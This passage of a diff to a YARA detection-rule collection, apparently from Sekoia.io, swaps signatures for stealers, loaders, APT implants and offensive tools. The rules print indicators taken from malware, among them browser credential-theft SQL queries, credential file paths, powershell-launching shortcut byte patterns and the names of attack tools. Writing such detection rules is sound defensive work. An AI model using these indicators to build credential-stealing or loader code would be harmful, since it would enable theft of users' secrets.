-        8D 85 ?? ?? ?? ??
-        6A ??
-        50
-        C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-        }
+		$str01 = "Enigma.Loader.Driver_x64.dll" ascii
+		$str02 = "C:\\projects\\driver\\Driver\\x64\\Release\\driver.pdb" ascii
+		$str03 = "/getFile?file_id=" ascii
+		$str04 = "/file/bot" ascii
+		$str05 = "Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator." wide
+		$str06 = "[GetTgFileById][GetTgRequest] reply is NULL" wide
+		$str07 = "Telegram request failed" wide
+		$str08 = "Vul driver data destroyed before unlink" wide
+		$str09 = "GetExportAddress hash not found: %x" wide
+		$str10 = "\\REGISTRY\\MACHINE\\HARDWARE\\RESOURCEMAP\\PnP Manager\\PnpManager" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and any of them
+		uint16( 0 ) == 0x5A4D and 4 of them
 }
-rule SEKOIA_Malware_Win_Mex : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_1 : FILE
 {
 	meta:
-		description = "Detect the MEX malware"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "57fe8525-4bab-4078-ac6f-635f0f7963ec"
-		date = "2022-07-28"
+		id = "82fd284a-47c2-4d29-9c80-f3affaa61a13"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_win_mex.yar#L1-L57"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_1.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1335a212d1af0087cd0e0402f3d6c864d1aafd3df3f1e4bb3851c96c3ff403cb"
+		logic_hash = "20e42042bd03bde3d0eec42f81d560896e8ec9e67ad64611dc4bc21152db3ff0"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "MEX: In-memory execution of offensive tradecraft (Version:" wide
-		$ = "Available Options:" wide
-		$ = "-meh <help>" wide
-		$ = "-mep <payload_name_to_use>" wide
-		$ = "-mec <payload_args>" wide
-		$ = "Execution examples:" wide
-		$ = "mex.exe -mep sharphound" wide
-		$ = "mex.exe -mep sharphound -mec -arg1" wide
-		$ = "mex.exe -mep get_version" wide
-		$ = "mex.exe -mep list_plugins" wide
-		$ = "Available plugins:" wide
-		$ = "Payload to execute:" wide
-		$ = "No payload arguments were provided" wide
-		$ = "Payload arguments:" wide
-		$ = "MEX - About to execute payload %s with command line arguments: %s" wide
-		$ = "MEX - About to execute payload %s with no command line arguments" wide
-		$ = "Execution of payload %s just finished. Quitting now." wide
-		$ = "There was a problem executing payload %s. Quitting now." wide
-		$ = "chisel" wide
-		$ = "enum_script" wide
-		$ = "eop_script" wide
-		$ = "mexecatz" wide
-		$ = "scshell" wide
-		$ = "shares_script" wide
-		$ = "internalmonologue" wide
-		$ = "inveigh" wide
-		$ = "pingcastle" wide
-		$ = "rubeus" wide
-		$ = "seatbelt" wide
-		$ = "sharpexec" wide
-		$ = "sharphound3" wide
-		$ = "spoolsample" wide
-		$ = "standin" wide
-		$ = "grouper2" wide
-		$ = "lockless" wide
-		$ = "sharpoxidresolver" wide
-		$ = "sharpprinter" wide
-		$ = "list_plugins" wide
-		$ = "get_version" wide
-		$ = "Current version is %s" wide
-		$ = "Supported plugins:" wide
+		$ = "rc4 = function(key, str)"
+		$ = "var e={},i,b=0,c,x,l=0,a,r="
+		$ = "var plain = rc4("
+		$ = "<script language="
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 10MB and 15 of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Tool_Gsocket_Strings : FILE
+
+rule SEKOIA_Apt_Darkpink_Loader_Decryptionroutine : FILE
 {
 	meta:
-		description = "Detects Gsocket based on strings"
+		description = "Detects decryption routine of dark pink loader"
 		author = "Sekoia.io"
-		id = "55fb2f2b-1074-4b6d-9113-48eaeb0e1e27"
-		date = "2024-06-10"
+		id = "fefc7b2f-eecc-49dc-84bc-24c45e9ea8f0"
+		date = "2023-01-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_gsocket_strings.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_darkpink_loader_decryptionroutine.yar#L4-L49"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c54308293a9f64b571282eac9fba01e4671ba6b0cd45936fab92d4d9af904bbb"
+		logic_hash = "fe2726b77c293fc2aa19216025cfa2b4cd0c5194730cbc57a1fcceb6f6198977"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hashs = "3f38860d0f6f0ff1b65219379f8793383cba85b11de1c853192fb2d2ba99e481"
+		hashs = "b3f1d6366ebc184f634a240c838b39d729c28b8718b0b9ca6be988a7e446ec42"
 
 	strings:
-		$ = "proxy. It allows multiple gs-netcat clients to (securely) relay"
-		$ = "GS-NETCAT(1)            General Commands Manual          GS-NETCAT(1)"
-		$ = "-T      Use TOR. The gs-netcat tool will connect via TOR to the GSRN."
-		$ = "-D      Daemon & Watchdog mode. Start gs-netcat as a background process"
-		$ = "gs-netcat [-rlgvqwCTSDiu] [-s secret] [-k keyfile] [-L logfile] [-d IP]"
-		$ = "The gs-netcat utility is a re-implementation of netcat."
+		$chunk_1 = {
+        8A 08
+        40
+        84 C9
+        75 ??
+        6A 00
+        2B C2
+        50
+        53
+        56
+        E8 ?? ?? ?? ??
+        8A 88 ?? ?? ?? ??
+        30 0C 3E
+        83 C6 01
+        83 D3 00
+        78 ??
+        7F ??
+        81 FE ?? ?? ?? ??
+        72 ??
+        55
+        }
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xcafebabe ) and filesize > 2MB and filesize < 6MB and 2 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 3MB and ( all of them or hash.md5 ( pe.rich_signature.clear_data ) == "950c0710dc4cbf6e2cd6b857d25da523" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "547e43dd8560fa8b0ca0be9f633bf62d" ) )
 }
-rule SEKOIA_Apt_Oilrig_Oilbooster_Strings : FILE
+
+rule SEKOIA_Stealer_Win_Luca : FILE
 {
 	meta:
-		description = "Detects OilBooster malware based on strings"
+		description = "Detect Luca stealer. Open source Rust stealer."
 		author = "Sekoia.io"
-		id = "001d12bc-1e7e-4a6c-9172-66687d08d827"
-		date = "2023-12-20"
+		id = "d2cc1442-0ba5-4e81-9fea-e9e078903eed"
+		date = "2022-07-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_oilbooster_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/stealer_win_luca.yar#L3-L49"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9562d373ba7602d250aec1eefa2d671da64e897e490da284ffa0e310074266cf"
+		logic_hash = "3694db49d84f92c70c51e4fe6f126fd56b3d7d8ed26619137fd55b0adb97865e"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/rt.ovf" wide ascii
-		$ = "User-Agent: " wide ascii
-		$ = "/me/drive/items" wide ascii
-		$ = "client_secret" wide ascii
+		$ = "cookies"
+		$ = "creditcards"
+		$ = "/Default/Network/CookiesUser Data/Default/Network/Cookies_cookies"
+		$ = "/Default/Web DataUser Data/Default/Web Data_webdata"
+		$ = "SELECT action_url, username_value, password_value FROM loginsSELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cardsSELECT host_key, name, encrypted_value, path, expires_utc, is_secure FROM cookiesLOCALAPPDATA"
+		$ = "\\logsxc\\passwords_.txt"
+		$ = " Name:"
+		$ = "User: "
+		$ = "Installed Languages:  "
+		$ = "Operating System: "
+		$ = "Used/Installed RAM:  GB "
+		$ = "Cores available: "
+		$ = "\\screen-.png"
+		$ = "Username: "
+		$ = "Computer name: "
+		$ = "OS: "
+		$ = "Language: "
+		$ = "Hostname: "
+		$ = "=> networks: B"
+		$ = "=> system:total memory:  KB"
+		$ = "used memory : "
+		$ = "total swap  : "
+		$ = "used swap   : "
+		$ = "NB CPUs: "
+		$ = "Passwords: "
+		$ = "Wallets: "
+		$ = "Files: "
+		$ = "Credit Cards: "
+		$ = "sensfiles.zip"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
+		uint16( 0 ) == 0x5A4D and filesize > 4000KB and pe.rich_signature.toolid ( 0 , 0 ) and pe.number_of_resources == 0 and 15 of them
 }
-rule SEKOIA_Infostealer_Win_Phoenix : FILE
+rule SEKOIA_Infostealer_Win_Redline_Strings : FILE
 {
 	meta:
-		description = "Finds Phoenix Stealer samples based on specific strings"
+		description = "Finds Redline samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "d63a8fcf-f897-4c36-a6ce-4bd4ae0154e5"
-		date = "2023-06-20"
+		id = "0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e"
+		date = "2022-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_phoenix.yar#L1-L33"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_redline_strings.yar#L1-L47"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c8a3a9a36c978cfc28fc6e21af10894161279dfd2e2ad665c3296fda10f6303d"
+		logic_hash = "44443e16b788231b3f256b4d1e91c458c33963d5737d69fc5850f6b0efa7726b"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "nkbihfbeogaeaoehlefnkodbefgpgknn" ascii
-		$str02 = "Discord\\Tokens.txt" ascii
-		$str03 = "SOFTWARE\\OpenVP" ascii
-		$str04 = "config_dir" ascii
-		$str05 = "| Last Login:" ascii
-		$str06 = "| Games:" ascii
-		$str07 = "| Host:" ascii
-		$str08 = "| Port:" ascii
-		$str09 = "| User:" ascii
-		$str10 = "| Pass:" ascii
-		$str11 = "Grabber.rar" ascii
-		$str12 = "\\GHISLER\\wcx_ftp.ini" ascii
-		$str13 = "Clipboard.txt" ascii
-		$str14 = "PROCESSOR_ARCHITECTURE" ascii
-		$str15 = "PROCESSOR_IDENTIFIER" ascii
-		$str16 = "Log.txt" ascii
-		$str17 = "xXxXxXxXxXx" ascii
-		$str18 = "hq101ejedmwcvvasd02kw" ascii
+		$gen01 = "ChromeGetRoamingName" ascii
+		$gen02 = "ChromeGetLocalName" ascii
+		$gen03 = "get_UserDomainName" ascii
+		$gen04 = "get_encrypted_key" ascii
+		$gen05 = "browserPaths" ascii
+		$gen06 = "GetBrowsers" ascii
+		$gen07 = "get_InstalledInputLanguages" ascii
+		$gen08 = "BCRYPT_INIT_AUTH_MODE_INFO_VERSION" ascii
+		$spe0 = "Profile_encrypted_value" wide
+		$spe1 = "[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}" wide
+		$spe2 = "AFileSystemntivFileSystemirusPrFileSystemoduFileSystemct|AntiFileSystemSpyWFileSystemareProFileSystemduct|FireFileSystemwallProdFileSystemuct" wide
+		$spe3 = "OpHandlerenVPHandlerN ConHandlernect%DSK_23%Opera GXcookies" wide
+		$spe4 = "//settinString.Removeg[@name=\\PasswString.Removeord\\]/valuString.RemoveeROOT\\SecurityCenter" wide
+		$spe5 = "ROOT\\SecurityCenter2Web DataSteamPath" wide
+		$spe6 = "windows-1251, CommandLine:" wide
+		$spe7 = "OFileInfopeFileInfora GFileInfoX StabFileInfole" wide
+		$spe8 = "ApGenericpDaGenericta\\RGenericoamiGenericng\\" wide
+		$spe9 = "*wallet*" wide
+		$typ01 = "359A00EF6C789FD4C18644F56C5D3F97453FFF20" ascii
+		$typ02 = "F413CEA9BAA458730567FE47F57CC3C94DDF63C0" ascii
+		$typ03 = "A937C899247696B6565665BE3BD09607F49A2042" ascii
+		$typ04 = "D67333042BFFC20116BF01BC556566EC76C6F7E2" ascii
+		$typ05 = "4E3D7F188A5F5102BEC5B820632BBAEC26839E63" ascii
+		$typ06 = "FB10FF1AD09FE8F5CA3A85B06BC96596AF83B350" ascii
+		$typ07 = "77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60" ascii
+		$typ08 = "A8F9B62160DF085B926D5ED70E2B0F6C95A25280" ascii
+		$typ09 = "718D1294A5C2D3F3D70E09F2F473155C4F567201" ascii
+		$typ10 = "2FBDC611D3D91C142C969071EA8A7D3D10FF6301" ascii
+		$typ11 = "2A19BFD7333718195216588A698752C517111B02" ascii
+		$typ12 = "EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2" ascii
+		$typ13 = "04EC68A0FC7D9B6A255684F330C28A4DCAB91F13" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 15 of them and filesize > 500KB
+		uint16( 0 ) == 0x5A4D and ( 7 of ( $gen* ) or 3 of ( $spe* ) or 2 of ( $typ* ) )
 }
-rule SEKOIA_Apt_Apt10_Hui_Loader : FILE
+rule SEKOIA_Tool_Win_Lightrail : FILE
 {
 	meta:
-		description = "Specific string for HUI Loader"
+		description = "Detect the LIGHTRAIL tunneler used by UNC1549"
 		author = "Sekoia.io"
-		id = "97d17052-80d0-4f8e-8b3a-2e0d622522a9"
-		date = "2022-07-04"
+		id = "39259f2c-11fe-4edd-8a9e-f36920132272"
+		date = "2024-02-29"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt10_hui_loader.yar#L1-L17"
+		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_lightrail.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "33df202599c6bceff2cf76acdc0096f7167acb69c541b3cfe4cdc34edc174005"
+		logic_hash = "84491bf7e955930c04e96f63ffb8c8f35ad02d9a917eceb727bf87c9ed3d831e"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "e7ddab967b0487827db069833221aa2fe4ca05f7cda976cbc528ecb306a22774"
+		hash2 = "4ecd511d9654f7fd66a61eb4ab6d7153040b5092d1594ff39935f01fbdbd4914"
+		hash3 = "3472bc8ed6182eb17811c97ada7ebd48034ad09b6a7062b341fe09818d7a309f"
+		hash4 = "ec7b97092278123f0c0613c5f9252eeccf55265d4aa5f2cfed57a63ebf3530ac"
+		hash5 = "8f3757b8f5888a1303af71cbc1a106927d3d6c45552ee192c3ed0347804c2194"
+		hash6 = "8b47b5ed1ed7afcc9194e1350d4e1996bd91ca3204747b586f309f4609a1a4cc"
 
 	strings:
-		$s1 = "HUIHWASDIHWEIUDHDSFSFEFWEFEWFDSGEFERWGWEEFWFWEWD" wide fullword
+		$s1 = "lastenzug.dll"
+		$s2 = "Lastenzug.dll"
+		$azure = ".cloudapp.azure.com" wide
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize > 30KB and filesize < 100KB and 1 of them
+		uint16be( 0 ) == 0x4d5a and 1 of ( $s* ) and $azure
 }
-rule SEKOIA_Loader_Amadey_Stealer_Plugin : FILE
+rule SEKOIA_Crime_Sload_Vbs_Wsf_Downloader : FILE
 {
 	meta:
-		description = "Finds Amadey's stealer plugin based on characteristic strings"
+		description = "Detects sLoad Downloader"
 		author = "Sekoia.io"
-		id = "50154e39-98b3-40e5-8986-18bbb7b15647"
-		date = "2023-05-16"
+		id = "55d87205-5f8f-479a-a616-bf3fce571f03"
+		date = "2022-08-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_amadey_stealer_plugin.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_vbs_wsf_downloader.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0410492f9424797b670a14f43ce063458e59d7958e213c07c3d488a40bf370e6"
+		logic_hash = "bd6a9112edb01544463aa7112432ad49360221e89a9ac15d5e8f6731b2b8780a"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "STEALERDLL.dll" ascii
-		$str02 = "?wal=1" fullword ascii
-		$str03 = "Content-Disposition: form-data; name=\"data\"; filename=\"" ascii
-		$str04 = "tar.exe -cf \"" ascii
-		$str05 = "SELECT origin_url, username_value, password_value FROM logins" ascii
-		$str06 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
-		$str07 = "\\SputnikLab\\Sputnik\\User Data\\Default\\Login Data" ascii
-		$str08 = "\\Mozilla\\Firefox\\Profiles\\" ascii
-		$str09 = "\"hostname\":\"([^\"]+)\"" ascii
-		$str10 = "\"encryptedUsername\":\"([^\"]+)\"" ascii
-		$str11 = "\"encryptedPassword\":\"([^\"]+)\"" ascii
-		$str12 = "&cred=" fullword ascii
-		$str13 = "D:\\Mktmp\\Amadey\\StealerDLL\\x64\\Release\\STEALERDLL.pdb" ascii
+		$ = { 53 65 74 20 6c 69 6e 6b 20 3d 20 [5-10] 2e 43 72 65 61 74 65 53 68 6f 72 74 63 75 74 28 }
+		$ = { 2e 72 75 6e 20 22 63 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 44 6f 63 75 6d 65 6e 74 73 5c [5-10] 2e 6c 6e 6b 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c }
+		$ = { 3d 22 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 20 22 }
+		$ = { 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 20 22 20 26 20 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 7 of them
+		2 of them and filesize < 1KB
 }
-rule SEKOIA_Radx_Stealer : FILE
+rule SEKOIA_Infostealer_Win_Phoenix : FILE
 {
 	meta:
-		description = "detection of RADX stealer based on function named in the .NET payload"
+		description = "Finds Phoenix Stealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "bf2aae08-169c-4bc9-a1ac-80f4b79ef6d7"
-		date = "2023-12-22"
+		id = "d63a8fcf-f897-4c36-a6ce-4bd4ae0154e5"
+		date = "2023-06-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/radx_stealer.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_phoenix.yar#L1-L33"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b83ca089bb0ea7ad8b0f372de9a95ea9d35514f6a063b63986e6fd25bdc07095"
+		logic_hash = "c8a3a9a36c978cfc28fc6e21af10894161279dfd2e2ad665c3296fda10f6303d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245704,81 +245552,124 @@ rule SEKOIA_Radx_Stealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "get_FileName" ascii fullword
-		$s2 = "set_FileName" ascii fullword
-		$f1 = "TripleDESCryptoServiceProvider" ascii fullword
-		$f2 = "SendBase64ToServer" ascii fullword
-		$f3 = "SendCommandOutputToServer" ascii fullword
+		$str01 = "nkbihfbeogaeaoehlefnkodbefgpgknn" ascii
+		$str02 = "Discord\\Tokens.txt" ascii
+		$str03 = "SOFTWARE\\OpenVP" ascii
+		$str04 = "config_dir" ascii
+		$str05 = "| Last Login:" ascii
+		$str06 = "| Games:" ascii
+		$str07 = "| Host:" ascii
+		$str08 = "| Port:" ascii
+		$str09 = "| User:" ascii
+		$str10 = "| Pass:" ascii
+		$str11 = "Grabber.rar" ascii
+		$str12 = "\\GHISLER\\wcx_ftp.ini" ascii
+		$str13 = "Clipboard.txt" ascii
+		$str14 = "PROCESSOR_ARCHITECTURE" ascii
+		$str15 = "PROCESSOR_IDENTIFIER" ascii
+		$str16 = "Log.txt" ascii
+		$str17 = "xXxXxXxXxXx" ascii
+		$str18 = "hq101ejedmwcvvasd02kw" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 500KB and all of them
+		uint16( 0 ) == 0x5a4d and 15 of them and filesize > 500KB
 }
-rule SEKOIA_Malware_Win_Lyceum_Maldoc_Macro_20220613
+rule SEKOIA_Apt_Badmagic_Commonmagic_Main : FILE
 {
 	meta:
-		description = "Detect the macro contained in Lyceum maldoc to deploy its malware"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "3046bffd-261f-4d5b-9015-f2e5fc31c9c9"
-		date = "2022-06-13"
+		id = "99983df5-89d6-4fac-81e6-16e5ab20bde3"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_win_lyceum_maldoc_macro_20220613.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_main.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a9f4957e8198b4cb2229913a405b3e0fc97cbd3598bb583dbfdaf56ca278d4cb"
+		logic_hash = "9bcfd6e9e150399c7f11abc41205119ddf24ea0fef5816ed905cd9b1e9ec5c1e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "ActiveDocument.InlineShapes(i).PictureFormat.Brightness = 0.5" ascii
+		$ = "graph.microsoft.com" ascii wide
+		$ = "children?select=name,size" ascii wide fullword
+		$ = "\\\\.\\pipe\\PipeCrDtMd" ascii wide fullword
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Tool_Lsass_Dump_Strings : FILE
+rule SEKOIA_Apt_37_Chinotto : FILE
 {
 	meta:
-		description = "Detects Lsass dump based on strings"
+		description = "Detects obfuscation and string of APT37 stealer"
 		author = "Sekoia.io"
-		id = "bf024dc6-a1c8-4c3f-9bf8-8d246c129639"
-		date = "2024-09-09"
+		id = "eff8fd11-dc7a-4011-b083-181d0cca8790"
+		date = "2023-02-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_lsass_dump_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_37_chinotto.yar#L1-L50"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "f4540f42902c068b9290239729c45324"
-		logic_hash = "7dfee9368297b3fd6c7f247a65b5344da0f5438c2145c5d53af48983d0d9a745"
+		logic_hash = "a721f102b4c9568379649f8004fa4eb460240145ab829d8ce3740dafb52d13c8"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "feab7940559392bbf38f29267509340569160e0a3b257fd86e5c65ae087ea014"
+		hash2 = "c9d2c8b6011a53e68e4a6c6e51142cef3348951d0b379e49b1a65a1891538df5"
+		hash3 = "2f5be3773e7e3a2f6806cdef154adfabc454c0e57a49e437c5889ce09b739302"
+		hash4 = "5bf170c95ca0e2079653d694f783b5bcd38f274ea875f67f0b60db4ac552a66c"
+		hash5 = "6fad04c836bc923f12ebaec8d8fb0c7091b044bf6f5c97e36d7bf46b8494f978"
+		hash6 = "64fe964f342acca6d85d247c4f67503e4222a58dfc5c644dedc2006a4b356d39"
+		hash7 = "6e216b265ea391f71f2a609df995f36b9ba8b17c8859f6d8e4ce4a076d351efd"
+		hash8 = "70dcc03cde3dd5c5ec6a6a240190cfb51667aaba9c867e20281e8dfc43afa891"
+		hash9 = "5053390bde150b771f8efe344b692c6c5718ba9203a4b23f5323af1ee9060ff2"
+		hash10 = "089e4dfd8b25afe596eff05baae86156a4e3243c84faa15416cff31a5120e107"
+		hash11 = "37e096338a78cb06d6236cb5a04cf125f191871ded3c9421f08a37890a095eb8"
+		hash12 = "b90a2b0249407b271a5d849fe82cbf4e9a31c2c6259caf515c9be3897e327414"
+		hash13 = "8f4751ed22619b04009c4b85ec45c8140b570835ca4c638c9e6019e7b7eb66c7"
 
 	strings:
-		$ = "[SUCCESS] Successfully dumped core LSASS information for PID:"
-		$ = "[SUCCESS] All data dumped to "
-		$ = "[ERROR] Unable to dump process"
+		$chunk_1 = {
+        C7 85 ?? ?? ?? ?? ?? ?? ?? 00
+        C7 85 ?? ?? ?? ?? ?? ?? ?? 00
+        33 C0
+        EB 03
+        8D 49 00
+        8B 8C 85 ?? ?? ?? ??
+        3B 8C 85 ?? ?? ?? ??
+        }
+		$chunk_2 = {
+        C7 84 24 ?? ?? ?? ?? ?? ?? 0? 00
+        C7 84 24 ?? ?? ?? ?? ?? ?? 0? 00
+        33 C0
+        EB 0D
+        8D A4 24 00 00 00 00
+        8D 9B 00 00 00 00
+        8B 8C 84 ?? ?? ?? ??
+        3B 8C 84 ?? ?? ?? ??
+        }
+		$movs_zip_dir_start = { C7 45 ?? 5A 69 70 20 C7 45 ?? 44 69 72 20 C7 45 ?? 53 74 61 72  C7 45 ?? 74 20 2D 20}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and ( $chunk_1 or $chunk_2 ) and $movs_zip_dir_start
 }
-rule SEKOIA_Rat_Win_Xworm_V3 : FILE
+rule SEKOIA_Tool_Realblindingedr_Strings : FILE
 {
 	meta:
-		description = "Finds XWorm (version XClient, v3) samples based on characteristic strings"
+		description = "Detects RealBlindingEDR based on strings"
 		author = "Sekoia.io"
-		id = "5fb1cbd3-1e37-43b9-9606-86d896f2150b"
-		date = "2023-03-03"
+		id = "505dcbee-ae37-47c1-a322-2c52d10e68d7"
+		date = "2024-09-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_xworm_v3.yar#L1-L30"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_realblindingedr_strings.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "0016647c3c7031e744c0af6f9eadb73ab5cab1ca4f8ce7633f4aa069b62755cd"
-		hash = "07e747a9313732d2dcf7609b6a09ac58d38f5643299440b827ec55f260e33c12"
-		hash = "de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147"
-		logic_hash = "9a50f41f6c295f48597f6db3f5d9141345b3711ef110a0f925c881f3a75580ca"
+		hash = "cb6219e2b6577b8d4a18114d595e10d7"
+		hash = "d0a251709c24a8f4c26d456dea22d90f"
+		logic_hash = "7b6a54c935bb40bd1be1d25be452d7185fd6f9dacbd7cbcde7cb37dfea09775e"
 		score = 75
 		quality = 80
 		tags = "FILE"
